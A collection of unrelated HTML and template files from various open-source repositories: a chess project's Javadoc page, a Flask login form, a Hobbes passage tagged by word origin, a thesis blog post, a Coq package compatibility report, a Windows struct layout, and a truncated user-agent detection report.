<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_24) on Fri Feb 22 14:06:12 EET 2013 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> javalabra.chess.core.impl.state (Chess 0.0.1-SNAPSHOT API) </TITLE> <META NAME="date" CONTENT="2013-02-22"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="javalabra.chess.core.impl.state (Chess 0.0.1-SNAPSHOT API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-use.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../javalabra/chess/core/impl/move/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../javalabra/chess/domain/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?javalabra/chess/core/impl/state/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <H2> Package javalabra.chess.core.impl.state </H2> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Class Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../javalabra/chess/core/impl/state/AbstractGameState.html" title="class in javalabra.chess.core.impl.state">AbstractGameState</A></B></TD> <TD>Abstract game state.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../javalabra/chess/core/impl/state/SelectMoveState.html" title="class in javalabra.chess.core.impl.state">SelectMoveState</A></B></TD> <TD>State object representing state when piece on the board is selected and game is waiting for a move to be choosen.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../javalabra/chess/core/impl/state/SelectPieceState.html" title="class in javalabra.chess.core.impl.state">SelectPieceState</A></B></TD> <TD>State object representing state when game is waiting for piece of concrete color to be selected.</TD> </TR> </TABLE> &nbsp; <P> <DL> </DL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-use.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../javalabra/chess/core/impl/move/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../javalabra/chess/domain/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?javalabra/chess/core/impl/state/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2013. All Rights Reserved. </BODY> </HTML>
nfrolov/useless-chess
javadoc/javalabra/chess/core/impl/state/package-summary.html
HTML
mit
7,218
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>18 --> 19</title> <link href="./../../assets/style.css" rel="stylesheet"> </head> <body> <h2>You have to be fast</h2> <a href="./4ac3f45b236dfce453c7b08f66748497144da944c805dd71a7d9c6d6ff5efcff.html">Teleport</a> <hr> <a href="./../../about.md">About</a> (Spoilers! ) <script src="./../../assets/md5.js"></script> <script> window.currentLevel = 7; </script> <script src="./../../assets/script.js"></script> </body> </html>
simonmysun/praxis
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/596deaa0ccc1e29ccba1a93b711a57943231695e12a907a1b27bc4e377c328de.html
HTML
mit
550
{% extends 'base.html' %} {% block content %} <div class="row"> <div class="col-md-12"> <form action="/login" method="post"> {{ form.csrf_token }} {{ form.next(value=next) }} <div class="form-group"> {{ form.username.label }} {{ form.username(class='form-control') }} </div> <div class="form-group"> {{ form.password.label }} {{ form.password(class='form-control') }} </div> <div class="form-group"> <input type="submit" class="form-control" value="Login"> </div> </form> </div> </div> <div class="row"> <div class="col-md-12"> {% with messages = get_flashed_messages() %} {% for message in messages %} <div class="alert alert-info">{{ message }}</div> {% endfor %} {% endwith %} </div> </div> {% endblock %}
douglasstarnes/vfcake2015-complete
vfcake2015app/templates/login.html
HTML
mit
971
<html> <head> </head> <body> <h2> Their Antiquity </h2> <span class="oldenglish"> Who </span> <span class="oldenglish"> were </span> <span class="oldenglish"> the </span> originall <span class="oldenglish"> writers </span> <span class="oldenglish"> of </span> <span class="oldenglish"> the </span> severall <span class="oldenglish"> Books </span> <span class="oldenglish"> of </span> <span class="oldenglish"> Holy </span> Scripture, has <span class="english"> not </span> been <span class="oldenglish"> made </span> <span class="oldfrench"> evident </span> <span class="oldenglish"> by </span> <span class="oldenglish"> any </span> <span class="oldfrench"> sufficient </span> <span class="oldfrench"> testimony </span> <span class="oldenglish"> of </span> <span class="oldenglish"> other </span> History, (which <span class="oldenglish"> is </span> <span class="oldenglish"> the </span> <span class="oldenglish"> only </span> <span class="oldfrench"> proof </span> <span class="oldenglish"> of </span> <span class="oldfrench"> matter </span> <span class="oldenglish"> of </span> fact); <span class="english"> nor </span> <span class="oldenglish"> can </span> <span class="oldenglish"> be </span> <span class="oldenglish"> by </span> <span class="oldenglish"> any </span> <span class="oldfrench"> arguments </span> <span class="oldenglish"> of </span> naturall Reason; <span class="oldenglish"> for </span> <span class="oldfrench"> Reason </span> serves <span class="oldenglish"> only </span> <span class="oldenglish"> to </span> <span class="latin"> convince </span> <span class="oldenglish"> the </span> <span class="oldenglish"> truth </span> (not <span class="oldenglish"> of </span> fact, but) <span class="oldenglish"> of </span> consequence. <span class="oldenglish"> The </span> <span class="oldenglish"> light </span> <span class="oldenglish"> therefore </span> <span class="oldenglish"> that </span> <span class="oldenglish"> must </span> <span class="oldfrench"> guide </span> <span class="oldenglish"> us </span> <span class="oldenglish"> in </span> <span class="oldenglish"> this </span> question, <span class="oldenglish"> must </span> <span class="oldenglish"> be </span> <span class="oldenglish"> that </span> <span class="oldenglish"> which </span> <span class="oldenglish"> is </span> <span class="oldenglish"> held </span> <span class="oldenglish"> out </span> <span class="oldenglish"> unto </span> <span class="oldenglish"> us </span> <span class="oldenglish"> from </span> <span class="oldenglish"> the </span> <span class="oldenglish"> Bookes </span> themselves: <span class="oldenglish"> And </span> <span class="oldenglish"> this </span> light, <span class="oldenglish"> though </span> <span class="oldenglish"> it </span> <span class="americanenglish"> show </span> <span class="oldenglish"> us </span> <span class="english"> not </span> <span class="oldenglish"> the </span> <span class="oldenglish"> writer </span> <span class="oldenglish"> of </span> <span class="oldenglish"> every </span> book, <span class="oldenglish"> yet </span> <span class="oldenglish"> it </span> <span class="oldenglish"> is </span> <span class="english"> not </span> unusefull <span class="oldenglish"> to </span> <span class="oldenglish"> give </span> <span class="oldenglish"> us </span> <span class="english"> knowledge </span> <span class="oldenglish"> of </span> <span class="oldenglish"> the </span> time, <span class="dutch"> wherein </span> <span class="oldnorse"> they </span> <span class="oldenglish"> were </span> written. </body> </html>
charlesreid1/wordswordswords
etymology/html/leviathan465.html
HTML
mit
4,204
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Master thesis presentation &#8211; OpenLaws</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="Presentation of Master thesis @CEID"> <meta name="author" content="Kostas Plessas"> <meta name="keywords" content="publications"> <link rel="canonical" href="http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/"> <!-- Custom CSS --> <link rel="stylesheet" href="/css/pixyll.css" type="text/css"> <!-- Fonts --> <link href='//fonts.googleapis.com/css?family=Merriweather:900,900italic,300,300italic' rel='stylesheet' type='text/css'> <link href='//fonts.googleapis.com/css?family=Lato:900,300' rel='stylesheet' type='text/css'> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <!-- Open Graph --> <!-- From: https://github.com/mmistakes/hpstr-jekyll-theme/blob/master/_includes/head.html --> <meta property="og:locale" content="en_US"> <meta property="og:type" content="article"> <meta property="og:title" content="Master thesis presentation"> <meta property="og:description" content="A Project Opening Greek Legislation to Citizens"> <meta property="og:url" content="http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/"> <meta property="og:site_name" content="OpenLaws"> <!-- Icons --> <link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="60x60" href="/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png"> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png"> <link rel="icon" type="image/png" href="/favicon-96x96.png" sizes="96x96"> <link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="/android-chrome-192x192.png" sizes="192x192"> </head> <body class=""> <div class="site-wrap"> <header class="site-header px2 px-responsive"> <div class="mt2 wrap"> <div class="measure"> <div><a href="http://www.openlaws.gr"><img src="/images/logo.png" alt="logo"/></a></div> <nav class="site-nav right"> <a href="/about/">About</a> <a href="/roadmap/">Roadmap</a> <!--<a href="/contact/">Contact</a>--> </nav> <div class="clearfix"></div> <div class="social-icons"> <div class="right"> <a class="fa fa-github" href="https://github.com/OpenLawsGR"></a> <a class="fa fa-rss" href="/feed.xml"></a> <a class="fa fa-twitter" href="https://twitter.com/OpenLawsGR"></a> <a class="fa fa-envelope" href="mailto:kplessas@ceid.upatras.gr"></a> </div> <div class="right"> </div> </div> <div class="clearfix"></div> </div> </div> </header> <div class="post p2 p-responsive wrap" role="main"> <div class="measure"> <div class="post-header mb2"> <h1>Master thesis presentation</h1> <span class="post-meta">Oct 19, 2016</span><br> <span class="post-meta small">1 minute read</span> </div> <article class="post-content"> <p>This project is implemented in the framework of a Master thesis for the postgraduate program Computer Science and Technology at the <a href="https://www.ceid.upatras.gr/en">Department of Computer Engineering and Informatics</a> of the <a href="http://www.upatras.gr/en">University of Patras</a>, which is supervised by <a href="http://athos.cti.gr/garofalakis/index_en.htm">Prof. John Garofalakis</a> and postdoctoral researcher <a href="http://www.plessas.info/index.php/home-en/">Athanasios Plessas</a>.</p> <p>Last week, the defense presentation of the thesis took place successfully.</p> <p><img src="/images/master_thesis_presentation.jpg" alt="Master thesis presentation"></p> <p>The text of the thesis (in Greek) can be found <a href="https://dl.dropboxusercontent.com/u/104921582/K.Plessas_Master_Thesis.pdf">here</a>.</p> <p>The presentation (also in Greek) can be found <a href="https://dl.dropboxusercontent.com/u/104921582/K.Plessas_Master_Thesis_Presentation.pdf">here</a>. </p> </article> <div class="share-page"> Share this post! <div class="share-links"> <a class = "fa fa-facebook" href="https://facebook.com/sharer.php?u=http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/" rel="nofollow" target="_blank" title="Share on Facebook"></a> <a class="fa fa-twitter" href="https://twitter.com/intent/tweet?text=Master thesis presentation&url=http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/" rel="nofollow" target="_blank" title="Share on Twitter"></a> <a class="fa fa-google-plus" href="https://plus.google.com/share?url=http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/" rel="nofollow" target="_blank" title="Share on Google+"></a> <a class="fa fa-linkedin" href="http://www.linkedin.com/shareArticle?url=http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/&title=Master thesis presentation" rel="nofollow" target="_blank" title="Share on LinkedIn"></a> <a class = "fa fa-hacker-news" onclick="parent.postMessage('submit','*')" href="https://news.ycombinator.com/submitlink?u=http://www.openlaws.gr/publications/2016/10/19/master-thesis-presentation/&t=Master thesis presentation" rel="nofollow" target="_blank" title="Share on Hacker News"></a> </div> </div> <div id="disqus_thread"></div> <script type="text/javascript"> var disqus_shortname = 'OpenLawsGR'; var disqus_identifier = '/publications/2016/10/19/master-thesis-presentation'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); </script> <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> </div> </div> </div> <footer class="footer"> <div class="p2 wrap"> <div class="measure mt1 center"> <small> Based on <a href="https://github.com/johnotander/pixyll">Pixyll</a> theme for <a href="http://jekyllrb.com/">Jekyll</a>. This site is not affiliated in any way to <a href="http://www.openlaws.eu">openlaws.eu</a>. </small> </div> </div> </footer> </body> </html>
OpenLawsGR/OpenLawsGR.github.io
publications/2016/10/19/master-thesis-presentation/index.html
HTML
mit
7,403
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>metacoq-erasure: Not compatible 👼</title> <link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" /> <link href="../../../../../bootstrap.min.css" rel="stylesheet"> <link href="../../../../../bootstrap-custom.css" rel="stylesheet"> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script src="../../../../../moment.min.js"></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container"> <div class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="../..">clean / extra-dev</a></li> <li class="active"><a href="">8.10.dev / metacoq-erasure - 1.0~alpha+8.8</a></li> </ul> </div> </div> </div> <div class="article"> <div class="row"> <div class="col-md-12"> <a href="../..">« Up</a> <h1> metacoq-erasure <small> 1.0~alpha+8.8 <span class="label label-info">Not compatible 👼</span> </small> </h1> <p>📅 <em><script>document.write(moment("2020-07-17 06:06:32 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2020-07-17 06:06:32 UTC)</em><p> <h2>Context</h2> <pre># Packages matching: installed # Name # Installed # Synopsis base-bigarray base base-threads base base-unix base conf-findutils 1 Virtual package relying on findutils conf-m4 1 Virtual package relying on m4 coq 8.10.dev Formal proof management system num 1.3 The legacy Num library for arbitrary-precision integer and rational arithmetic ocaml 4.08.1 The OCaml compiler (virtual package) ocaml-base-compiler 4.08.1 Official release 4.08.1 ocaml-config 1 OCaml Switch Configuration ocamlfind 1.8.1 A library manager for OCaml # opam file: opam-version: &quot;2.0&quot; maintainer: &quot;matthieu.sozeau@inria.fr&quot; homepage: &quot;https://metacoq.github.io/metacoq&quot; dev-repo: &quot;git+https://github.com/MetaCoq/metacoq.git#coq-8.8&quot; bug-reports: &quot;https://github.com/MetaCoq/metacoq/issues&quot; authors: [&quot;Abhishek Anand &lt;aa755@cs.cornell.edu&gt;&quot; &quot;Simon Boulier &lt;simon.boulier@inria.fr&gt;&quot; &quot;Cyril Cohen &lt;cyril.cohen@inria.fr&gt;&quot; &quot;Yannick Forster &lt;forster@ps.uni-saarland.de&gt;&quot; &quot;Fabian Kunze &lt;fkunze@fakusb.de&gt;&quot; &quot;Gregory Malecha &lt;gmalecha@gmail.com&gt;&quot; &quot;Matthieu Sozeau &lt;matthieu.sozeau@inria.fr&gt;&quot; &quot;Nicolas Tabareau &lt;nicolas.tabareau@inria.fr&gt;&quot; &quot;Théo Winterhalter &lt;theo.winterhalter@inria.fr&gt;&quot; ] license: &quot;MIT&quot; build: [ [&quot;sh&quot; &quot;./configure.sh&quot;] [make &quot;-j%{jobs}%&quot; &quot;-C&quot; &quot;erasure&quot;] [make &quot;test-suite&quot;] {with-test} ] install: [ [make &quot;-C&quot; &quot;erasure&quot; &quot;install&quot;] ] depends: [ &quot;ocaml&quot; {&gt; &quot;4.02.3&quot;} &quot;coq&quot; {&gt;= &quot;8.8&quot; &amp; &lt; &quot;8.9~&quot;} &quot;coq-metacoq-template&quot; {= version} &quot;coq-metacoq-checker&quot; {= version} &quot;coq-metacoq-pcuic&quot; {= version} &quot;coq-metacoq-safechecker&quot; {= version} ] synopsis: &quot;Implementation and verification of an erasure procedure for Coq&quot; description: &quot;&quot;&quot; MetaCoq is a meta-programming framework for Coq. The Erasure module provides a complete specification of Coq&#39;s so-called \&quot;extraction\&quot; procedure, starting from the PCUIC calculus and targeting untyped call-by-value lambda-calculus. The `erasure` function translates types and proofs in well-typed terms into a dummy `tBox` constructor, following closely P. Letouzey&#39;s PhD thesis. &quot;&quot;&quot; url { src: &quot;https://github.com/MetaCoq/metacoq/archive/1.0-alpha+8.8.tar.gz&quot; checksum: &quot;sha256=c2fe122ad30849e99c1e5c100af5490cef0e94246f8eb83f6df3f2ccf9edfc04&quot; }</pre> <h2>Lint</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Dry install 🏜️</h2> <p>Dry install with the current Coq version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam install -y --show-action coq-metacoq-erasure.1.0~alpha+8.8 coq.8.10.dev</code></dd> <dt>Return code</dt> <dd>5120</dd> <dt>Output</dt> <dd><pre>[NOTE] Package coq is already installed (current version is 8.10.dev). The following dependencies couldn&#39;t be met: - coq-metacoq-erasure -&gt; coq &lt; 8.9~ -&gt; ocaml &lt; 4.06.0 base of this switch (use `--unlock-base&#39; to force) Your request can&#39;t be satisfied: - No available version of coq satisfies the constraints No solution found, exiting </pre></dd> </dl> <p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-metacoq-erasure.1.0~alpha+8.8</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Install dependencies</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Install 🚀</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Installation size</h2> <p>No files were installed.</p> <h2>Uninstall 🧹</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Missing removes</dt> <dd> none </dd> <dt>Wrong removes</dt> <dd> none </dd> </dl> </div> </div> </div> <hr/> <div class="footer"> <p class="text-center"> Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣 </p> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../../../../bootstrap.min.js"></script> </body> </html>
coq-bench/coq-bench.github.io
clean/Linux-x86_64-4.08.1-2.0.5/extra-dev/8.10.dev/metacoq-erasure/1.0~alpha+8.8.html
HTML
mit
7,992
<html><body> <h4>Windows 10 x64 (19041.208) 2004</h4><br> <h2>_HEAP_DESCRIPTOR_KEY</h2> <font face="arial"> +0x000 Key : Uint4B<br> +0x000 EncodedCommittedPageCount : Pos 0, 16 Bits<br> +0x000 LargePageCost : Pos 16, 8 Bits<br> +0x000 UnitCount : Pos 24, 8 Bits<br> </font></body></html>
epikcraw/ggool
public/Windows 10 x64 (19041.208) 2004/_HEAP_DESCRIPTOR_KEY.html
HTML
mit
328
{{ define "main" }} <!-- Header --> {{ partial "header" . }} <div class="container"> <section id="projects"> <h4 class="my-5">{{ .Site.Data.projects.name }}</h4> <div class="panel"> <div class="panel-body"> {{ range $el := .Site.Data.projects.source }} <h5> <i class="{{ .icon }}"></i>&nbsp;&nbsp; <b><a href="{{ .url }}">{{ $el.name }}</a></b>&nbsp;-&nbsp;{{ $el.description }} </h5> {{ end }} </div> </div> </section> </div> {{ end }}
nurlansu/hugo-sustain
layouts/_default/projects.html
HTML
mit
560
--- layout: default title: Отправить совет! --- <div class="grid_8 alpha omega white"> <h2>Отправить совет!</h2> <iframe src="http://spreadsheets.google.com/embeddedform?key=pNxLaOX4yIJnLpmHYEDxXXQ" width="590" height="616" frameborder="0" marginheight="0" marginwidth="0">Загрузка...</iframe> </div>
gitready/ru
submit.html
HTML
mit
341
<html> <head> <title>User agent detail - Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> </head> <body> <div class="container"> <div class="section"> <h1 class="header center orange-text">User agent detail</h1> <div class="row center"> <h5 class="header light"> Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 </h5> </div> </div> <div class="section"> <table class="striped"><tr><th></th><th colspan="3">General</th><th colspan="5">Device</th><th colspan="3">Bot</th><th colspan="2"></th></tr><tr><th>Provider</th><th>Browser</th><th>Engine</th><th>OS</th><th>Brand</th><th>Model</th><th>Type</th><th>Is mobile</th><th>Is touch</th><th>Is bot</th><th>Name</th><th>Type</th><th>Parse time</th><th>Actions</th></tr><tr><th colspan="14" class="green lighten-3">Source result (test suite)</th></tr><tr><td>piwik/device-detector<br /><small>/Tests/fixtures/tablet.yml</small></td><td>Android Browser </td><td>Android 4.0.3</td><td>WebKit </td><td style="border-left: 1px solid #555">Asus</td><td>Eee Pad MeMO 171</td><td>tablet</td><td></td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td></td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-test">Detail</a> <!-- Modal Structure --> <div id="modal-test" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Testsuite result detail</h4> <p><pre><code class="php">Array ( [user_agent] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 [os] => Array ( [name] => Android [short_name] => AND [version] => 4.0.3 [platform] => ) [client] => Array ( [type] => browser [name] => Android Browser [short_name] => AN [version] => [engine] => WebKit ) [device] => Array ( [type] => tablet [brand] => AU [model] => Eee Pad MeMO 171 ) [os_family] => Android [browser_family] => Android Browser ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><th colspan="14" class="green lighten-3">Providers</th></tr><tr><td>BrowscapPhp<br /><small>6012</small></td><td>Android 4.0</td><td>WebKit </td><td>Android 4.0</td><td style="border-left: 1px solid #555"></td><td></td><td>Mobile Phone</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.02101</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-215ac98d-ccf8-4615-916e-5a819d6a59c9">Detail</a> <!-- Modal Structure --> <div id="modal-215ac98d-ccf8-4615-916e-5a819d6a59c9" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapPhp result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^mozilla\/5\.0 \(.*linux.*android.4\.0.* build\/.*\).*applewebkit\/.*\(.*khtml,.*like gecko.*\).*version\/4\.0.*safari.*$/ [browser_name_pattern] => mozilla/5.0 (*linux*android?4.0* build/*)*applewebkit/*(*khtml,*like gecko*)*version/4.0*safari* [parent] => 